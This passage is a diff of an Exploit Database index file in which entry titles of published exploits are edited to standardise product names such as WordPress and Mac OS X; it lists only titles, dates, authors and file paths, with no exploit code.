Disclosure",2007-01-17,DPR,windows,remote,0 +29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 +29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0 29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 @@ -26502,15 +26503,15 @@ id,file,description,date,author,platform,type,port 29504,platforms/php/webapps/29504.txt,"Unique Ads - Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 -29507,platforms/php/webapps/29507.txt,"212Cafe GuestBook 4.00 - show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 +29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 -29509,platforms/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 +29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow SEH Exploit (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0 30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation (via Local File Inclusion)",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"Wordpress 2.1.3 - Akismet Plugin Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 - Akismet Plugin Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 - \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass",2007-05-15,"Matousec Transparent security",multiple,local,0 @@ -26522,7 +26523,7 @@ id,file,description,date,author,platform,type,port 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 -30049,platforms/windows/remote/30049.html,"LeadTools Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 +30049,platforms/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote,0 30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 @@ -26532,7 +26533,7 @@ id,file,description,date,author,platform,type,port 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 -30015,platforms/php/webapps/30015.txt,"Advanced GuestBook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30018,platforms/linux/remote/30018.py,"Python 2.5 - PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 @@ -26546,23 +26547,23 @@ id,file,description,date,author,platform,type,port 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 - Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 -30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 +30014,platforms/windows/local/30014.py,"Microsoft Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - (objectDetail.php objectId parameter) SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - (objectDetail.php objectId Parameter) SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",linux,dos,0 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 -29522,platforms/php/webapps/29522.py,"Wordpress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 -29523,platforms/osx/dos/29523.txt,"Apple 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 +29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 +29523,platforms/osx/dos/29523.txt,"Apple Mac OS X 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 -29525,platforms/php/webapps/29525.txt,"Wordpress Highlight Premium Theme - Cross-Site Request Forgery File Upload",2013-11-10,DevilScreaM,php,webapps,0 +29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery File Upload",2013-11-10,DevilScreaM,php,webapps,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 -29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - .m3u Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 -29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 +29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 +29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 29531,platforms/windows/dos/29531.txt,"Yahoo! Messenger 8.0 - Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",windows,dos,0 @@ -26576,17 +26577,17 @@ id,file,description,date,author,platform,type,port 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 -39839,platforms/osx/dos/39839.txt,"Apple Quicktime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 +39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 -29682,platforms/php/webapps/29682.txt,"Wordpress 2.1.1 - post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 +29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 -29684,platforms/php/webapps/29684.txt,"Wordpress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 -29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 +29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 +29685,platforms/windows/remote/29685.txt,"Nullsoft SHOUTcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote,0 29686,platforms/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote,0 -29687,platforms/windows/remote/29687.py,"HyperBook GuestBook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 +29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 @@ -26595,11 +26596,11 @@ id,file,description,date,author,platform,type,port 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 -29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 +29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection",2013-11-13,Metasploit,windows,remote,402 -29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 -29554,platforms/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 -29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 +29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 +29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 +29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 @@ -26619,7 +26620,7 @@ id,file,description,date,author,platform,type,port 29572,platforms/php/webapps/29572.txt,"CPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 -29575,platforms/windows/remote/29575.txt,"Plain Old Webserver 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 +29575,platforms/windows/remote/29575.txt,"Plain Old WebServer 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 29577,platforms/php/dos/29577.php,"PHP 5.2.1 - STR_IReplace Remote Denial of Service",2007-02-09,"Thomas Hruska",php,dos,0 29578,platforms/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagviewer.php Multiple Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 @@ -26638,11 +26639,11 @@ id,file,description,date,author,platform,type,port 29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/updateconf.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/updatefilter.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/wordfilter.php Admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - (.wstyle) Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 +29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 - P Parameter Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server - SearchResults.aspx Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 -29598,platforms/php/webapps/29598.txt,"Wordpress 1.x/2.0.x - Templates.php Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 +29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - Templates.php Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 @@ -26660,21 +26661,21 @@ id,file,description,date,author,platform,type,port 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,webapps,0 29613,platforms/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos,0 29614,platforms/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote,0 -29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - Javascript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps,0 +29615,platforms/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps,0 29616,platforms/osx/dos/29616.xml,"Apple iTunes 7.0.2 - XML Parsing Remote Denial of Service",2007-02-19,poplix,osx,dos,0 29617,platforms/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",windows,dos,0 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0 -29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6.0 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 -29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 +29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 +29620,platforms/osx/dos/29620.txt,"Apple Mac OS X 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 29622,platforms/asp/webapps/29622.txt,"Design4Online - Userpages2 Page.asp SQL Injection",2007-02-20,xoron,asp,webapps,0 29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps,0 29624,platforms/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,php,webapps,0 -29625,platforms/php/webapps/29625.txt,"PHPTrafficA 1.4.1 - plotStat.php file Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 -29626,platforms/php/webapps/29626.txt,"PHPTrafficA 1.4.1 - banref.php lang Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 +29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 - plotStat.php file Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 +29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 - banref.php lang Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 - preview.php PHP_script_path Parameter Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 -29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - news.php link_parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 -29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - n_layouts.php link_parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29628,platforms/php/webapps/29628.txt,"Magic News Plus 1.0.2 - news.php link_Parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 +29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 - n_layouts.php link_Parameters Parameter Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps,0 29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - modules/out.php id Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 @@ -26711,11 +26712,11 @@ id,file,description,date,author,platform,type,port 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service (Denial of Service)",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 -29667,platforms/php/webapps/29667.txt,"Wordpress Euclid Theme 1.x.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29668,platforms/php/webapps/29668.txt,"Wordpress Dimension Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29669,platforms/php/webapps/29669.txt,"Wordpress Amplus Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29670,platforms/php/webapps/29670.txt,"Wordpress Make A Statement (MaS) Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29669,platforms/php/webapps/29669.txt,"WordPress Amplus Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +29670,platforms/php/webapps/29670.txt,"WordPress Make A Statement (MaS) Theme - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 +30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari - Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 @@ -26740,25 +26741,25 @@ id,file,description,date,author,platform,type,port 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - rating.php nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29699,platforms/novell/remote/29699.txt,"Novell Access Management SSLVPN Server - Security Bypass",2007-03-02,anonymous,novell,remote,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 -29701,platforms/php/webapps/29701.txt,"Wordpress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"Wordpress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0 29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 -30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 +30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network 